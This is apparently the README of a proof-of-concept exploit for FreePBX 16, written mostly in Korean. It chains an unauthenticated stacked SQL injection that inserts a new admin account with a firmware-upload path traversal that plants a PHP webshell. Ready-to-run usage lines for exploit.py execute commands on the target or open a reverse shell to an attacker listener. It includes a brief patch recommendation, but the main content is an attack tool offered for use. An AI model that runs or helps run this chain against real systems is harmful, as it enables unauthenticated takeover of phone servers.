
CVE-2025-57819-RCE_PoC
FreePBX 16 — Unauthenticated SQLi to RCE요약: 이 설명은 FreePBX 16의 두 취약점(CVE-2025-57819 및 CVE-2025-61678)을 결합하여 인증되지 않은 액세스에서 원격 코드 실행(Remote Code Execution, RCE)으로 권한을 상승시키는 전체 공격 체인을 보여줍니다. 취약점 CVE 정보 CVE 번호 영향 구성 요소 영향 및 취약점 유형 CVE-2025-57819 Endpoint 모듈 로더(brand 매개변수) 인증되지 않은 다중 명령 SQL 주입(Unauthenticated Stacked SQL Injection) CVE-2025-61678 Endpoint Manager 펌웨어 업로드 처리기(fwbrand 매개변수) 인증된 임의 파일 업로드 / 경로 탐색(Path Traversal) 공격 원리 및 절차 관리자 계정 만들기(CVE-2025-57819) 네임스페이스 모듈 로더(Namespaced Endpoint Loader)를 통해 인증되지 않은 다중 명령 SQL 주입 취약점을 트리거하여 ampusers 데이터 테이블에 전체 권한을 가진 새로운 관리자 계정을 직접 작성합니다. 인증(Authentication) 방금 만든 관리자 계정 정보로 FreePBX 백엔드 관리 인터페이스에 로그인합니다. WebShell 작성(CVE-2025-61678) Endpoint Manager의 펌웨어 업로드 기능을 악용하고 fwbrand 매개변수의 경로 탐색 취약점(../../../var/www/html/
)과 결합하여 PHP WebShell을 웹 루트 디렉터리에 직접 작성합니다. 명령 실행(Execution) 배포된 WebShell을 호출하여 단일 시스템 명령을 실행하거나 대화형 Reverse Shell을 생성합니다. 영향받는 버전 및 수정 권장 사항 영향받는 버전: FreePBX 16(Endpoint 모듈 버전 16.0.92 미만) FreePBX 17(17.0.6 이전 버전에서 수정됨) 수정 권장 사항: 가능한 한 빨리 최신 패치 버전으로 업데이트하십시오. 사용 설명(Usage) Bashpython3 exploit.py --rhost pbx.example.com --command "id"
python3 exploit.py --rhost pbx.example.com --lhost 10.0.0.5 --lport 4444
python3 exploit.py --rhost pbx.example.com --http --rport 80 --command "uname -a" 매개변수 설명(Options) 매개변수 설명 --rhost [필수] 대상 호스트 주소(Target Host) --rport 대상 통신 포트(기본값: 443) --http 기본 HTTPS 대신 HTTP를 강제로 사용